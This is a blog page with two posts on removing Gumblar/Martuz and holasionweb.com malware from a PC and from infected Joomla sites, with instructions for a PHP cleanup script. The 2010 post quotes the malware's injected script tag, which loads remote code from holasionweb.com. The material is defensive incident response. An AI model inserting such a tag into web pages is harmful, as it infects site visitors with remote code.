Daniel Ansari’s blog Random software musings

May 12, 2010

holasionweb.com

Filed under: Malware — admin @ 2:44 pm

One of my Joomla sites on shared GoDaddy hosting got re-infected this morning with this malware, which runs this script from every php file that it infects:

<script src=”http://holasionweb.com/oo.php”></script>

Interestingly, none of my other GoDaddy sites have got infected yet (and this blog is running an older version of WordPress), including one other Joomla site on the same server.

I modified my Gumblar removal script and added a regular expression to remove this malware.  It can be downloaded here.

Unlike the script at Securi.net (at the time of writing), this script does not leave a blank line at the top of your files, thus, you won’t get any errors from your web applications – it leaves your files in exactly the same state as before the infection.  It also saves your original infected file with a .bak extension, just in case you need to keep the originals for some reason.  These can be deleted later, and will not affect your site.

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/scan_files.php
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.

Notes:

  • The script skips files greater than approx 1 MB in size.
  • If the path to the file ends with /images/image.php or /images/gifimg.php, the script deletes it in update mode.  That’s because this was one of the signatures of the Gumblar malware.

Update (Aug 19, 2010): I added another script in scan_files.zip—that is delete_infected_backups.php.  In order to delete the .bak files:

  1. Place the file delete_infected_backups.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/delete_infected_backups.php
  3. Use delete_infected_backups.php?u=1 to run it in update mode, where the .bak files will actually be deleted.
  4. The script deletes all files with names ending in:
    • .html.bak
    • .htm.bak
    • .shtml.bak
    • .js.bak
    • .php.bak

May 19, 2009

Automatic removal of Gumblar/Martuz trojan

Filed under: Malware — Tags: , , — admin @ 11:08 pm

I won’t duplicate information contained on other websites, but I will refer to them here instead.

How your machine gets infected by Gumblar, or a “Gumblaroid” (Gumblar-type exploit) such as Martuz

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/
http://www.pcauthority.com.au/forums/yaf_postsm289075_A-nasty-virus-called-Gumblar.aspx

How to determine if your PC has the infection

http://www.dynamicdrive.com/forums/showthread.php?p=194695

These were the symptoms that I noticed on my PC:

1. My Visual Studio .NET 2005 was crashing a lot, and I could not get any work done using it.
2. In Firefox 3, each search result would initially redirect to a bogus ad page (I always open search results in a new tab), but clicking the search result once more would open the genuine page.
3. I could not start cmd from the XP Start/Run menu item.

How I removed this malware from my PC

1. I installed and scanned my PC with Malwarebytes’ Anti-Malware, which found the single file – in my case it was C:\WINDOWS\ukvvq.qnx – that was keeping the infection active. Manually deleting it, or letting Anti-Malware attempt to delete it, would delete it, but the file would reappear almost immediately. Don’t worry if Anti-Malware is unable to update its definitions online – this is another symptom of Gumblar – it still detects it, though as something else.
2. I ran Hijackthis (I didn’t need a scan), chose “misc tools”, and chose “delete file on reboot” for this file (according to http://www.dynamicdrive.com/forums/showthread.php?p=194695).
3. I ran regedit and deleted the registry entry (according to http://www.dynamicdrive.com/forums/showthread.php?p=194695).

That was it to remove it from my PC, voila! To protect my PC from re-infection, I disabled Adobe JavaScript according to http://www.pcauthority.com.au/forums/yaf_postsm289075_A-nasty-virus-called-Gumblar.aspx.

Unfortunately, it seems that several people resorted to rebuilding their machines from scratch.

How to remove the infection from a website

If you manage websites using an FTP program, there is a chance that your sites have become infected. The first thing you must do is change the ftp passwords after your machine has been cleaned.

As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.

I started off using the script by rad-one at http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/#comment-896.

I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.

Here is what my script does:

1. Recurses through the whole website, excluding files and/or directories of your choosing.
2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
3. All modified files are backed up using the .bak extension.
4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
5. Runs in report mode by default, so you can see which files would be modified.
6. Has a “verbose” option, so you can see how each file will be modified.

It does not change directory permissions. I haven’t got around to investigating that area yet.

You may download it here. (Use at your own risk.)

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.

Powered by WordPress